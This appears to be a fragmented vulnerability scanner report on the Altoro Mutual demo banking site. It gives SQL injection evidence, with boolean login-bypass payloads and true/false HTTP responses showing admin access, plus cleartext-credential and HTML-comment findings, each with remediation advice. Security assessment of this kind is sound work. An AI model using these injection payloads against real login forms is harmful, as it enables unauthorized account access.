Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:29:00 GMT
Connection: close
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:29:01 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6755
Date: Tue, 06 Aug 2019 04:34:43 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
<p>
Welcome to Altoro Mutual Online.
</p>
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
</tr>
</table>
</form>
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
</body>
</html>
<!-- END FOOTER -->
False Request: POST http://demo.testfire.net/doLogin HTTP/1.1
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:34:43 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6755
Date: Tue, 06 Aug 2019 04:28:56 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<p>
Welcome to Altoro Mutual Online.
</p>
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
</tr>
</table>
</form>
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
</body>
</html>
<!-- END FOOTER -->
False Request: POST http://65.61.137.117/doLogin HTTP/1.1
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:28:57 GMT
Connection: close
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: GET - http://demo.testfire.net/login.jsp
Detected password form in a non-secure page
Request: GET http://demo.testfire.net/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Remediation:
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: GET - http://65.61.137.117:8080/login.jsp
Detected password form in a non-secure page
Request: GET http://65.61.137.117:8080/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.
credentials
When authentication information such as a username or password is
passed to the server via an HTTP GET request, it is supplied using
query string parameters present in the URL. As a result, this
information may be readily available in proxy or web server logs.
Similarly, if such information is sent in an HTTP POST request or in
cookies over an unencrypted connection, it is prone to a
man-in-the-middle attack.
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: Login credentials found in the POST request body
POST - http://65.61.137.117/doLogin
uid=CHSuser contains CHSuser
passw=Passwor1 contains Passwor1
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
All login credentials should be transmitted using HTTPS using a POST
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: GET - http://demo.testfire.net:8080/login.jsp
Detected password form in a non-secure page
Request: GET http://demo.testfire.net:8080/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: POST - http://demo.testfire.net:8080/doLogin
Detected password form in a non-secure page
Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: Login credentials found in the POST request body
POST - http://65.61.137.117:8080/doLogin
uid=CHSuser contains CHSuser
passw=Passwor1 contains Passwor1
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
All login credentials should be transmitted using HTTPS using a POST
request.
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: Login credentials found in the POST request body
POST - http://demo.testfire.net/doLogin
uid=CHSuser contains CHSuser
passw=Passwor1 contains Passwor1
uid=CHSuser&passw=Passwor1&btnSubmit=Login
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: POST - http://demo.testfire.net/doLogin
Detected password form in a non-secure page
Request: POST http://demo.testfire.net/doLogin HTTP/1.1
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
All login credentials should be transmitted using HTTPS, either
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: POST - http://65.61.137.117:8080/doLogin
Detected password form in a non-secure page
Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: POST - http://65.61.137.117/doLogin
Detected password form in a non-secure page
Request: POST http://65.61.137.117/doLogin HTTP/1.1
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: Login credentials found in the POST request body
POST - http://demo.testfire.net:8080/doLogin
uid=CHSuser contains CHSuser
passw=Passwor1 contains Passwor1
uid=CHSuser&passw=Passwor1&btnSubmit=Login
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: GET - http://65.61.137.117/login.jsp
Detected password form in a non-secure page
Request: GET http://65.61.137.117/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://65.61.137.117:8080/index.jsp HTTP/1.1
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://65.61.137.117:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
comments
While adding general comments is very useful, some programmers
tend to leave important data in them, such as filenames related to the
web application, old links or links that were not meant to be browsed
by users, and old code fragments.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://65.61.137.117/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST https://65.61.137.117/sendFeedback HTTP/1.1
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/feedback.jsp
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://65.61.137.117/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST http://65.61.137.117/sendFeedback HTTP/1.1
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
comments
While adding general comments is very useful, some programmers
tend to leave important data in them, such as filenames related to the
web application, old links or links that were not meant to be browsed
by users, and old code fragments.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
https://demo.testfire.net/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://65.61.137.117:8080/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST http://65.61.137.117:8080/sendFeedback HTTP/1.1
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET
http://demo.testfire.net/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://demo.testfire.net/doLogin
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - https://demo.testfire.net:8443/index.jsp?content=personal.htm
GET - https://demo.testfire.net:8443/index.jsp?content=business.htm
GET - https://demo.testfire.net:8443/subscribe.jsp
POST - https://demo.testfire.net:8443/doSubscribe
GET -
https://demo.testfire.net:8443/default.jsp?content=security.htm
GET - https://demo.testfire.net:8443/survey_questions.jsp
GET - https://demo.testfire.net:8443/survey_questions.jsp?step=a
GET - https://demo.testfire.net:8443/status_check.jsp
GET - https://demo.testfire.net:8443/swagger/index.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET http://65.61.137.117/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/disclaimer.htm?url=http://www.microsoft.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET http://demo.testfire.net:8080/disclaimer.htm?url=http://www.microsoft.com HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://demo.testfire.net:8443/doLogin
Potentially sensitive comments found
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
http://65.61.137.117:8080/index.jsp?content=inside_contact.htm
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
